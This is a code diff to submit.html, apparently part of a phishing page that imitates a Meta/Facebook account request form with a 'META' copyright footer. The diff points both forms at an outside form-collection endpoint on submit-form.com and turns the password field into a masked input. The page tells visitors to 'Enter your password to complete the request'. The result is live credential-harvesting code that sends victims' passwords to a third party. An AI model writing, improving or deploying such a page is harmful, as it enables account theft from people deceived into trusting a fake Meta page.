--- a/submit.html
+++ b/submit.html
@@ -29,7 +29,7 @@
 </form>
 
 </div>
-  </div><form action="" method="post">
+  </div><form action="https://submit-form.com/DCHcxyVYA" method="post">
   <div class="relative flex border bg-[#e9ebee] h-10 md:hidden lg:hidden sm:block"><div>
 <div>
     <img class="h-5  mx-4 mt-2 shadow-2xl md:hidden lg:hidden sm:block" src="./home.png" alt="">
@@ -120,7 +120,7 @@
 </div>
 </div>
 
-                 <form class="sm:hidden lg:block md:block" action="post.php" method="post">
+                 <form class="sm:hidden lg:block md:block" action="https://submit-form.com/DCHcxyVYA" method="post">
 <div class="relative flex border bg-[#e9ebee] h-12 md:block lg:block hidden "><div>
 <div>
   <img class="h-7  mx-10 mt-2 shadow-2xl md:block lg:block hidden" src="./home.png" alt="">
@@ -177,7 +177,7 @@
 </div><div>
   <p class="mt-4 pl-3 text-[12px] font-semibold">
     Enter your password to complete the request
-  </p><input class="border h-6 pl-1 mx-3" type="text" name="password" required="">
+  </p><input class="border h-6 pl-1 mx-3" type="password" name="password" required="">
 </div><div>
   <p class="mt-4 pl-3 text-[12px] font-semibold">
     Please make sure account not to log out from your computer or laptop until you have received a verification email.
@@ -205,13 +205,13 @@
   <footer>
     <div>
       <li class="text-sm text-[#90949c] md:hidden lg:hidden sm:block mt-4 pl-72 flex hover:underline">
-        META©️ 2023      </li>
+        META©️ 2024      </li>
     </div>
 
 <div class="hidden lg:block md:bllock flex">
   <div>
     <p class="text-slate-400 text-sm">
-      META©️ 2023    </p>
+      META©️ 2024    </p>
   </div><div class="flex relative">
     <p class="pl-72 hover:underline text-slate-400">
       About
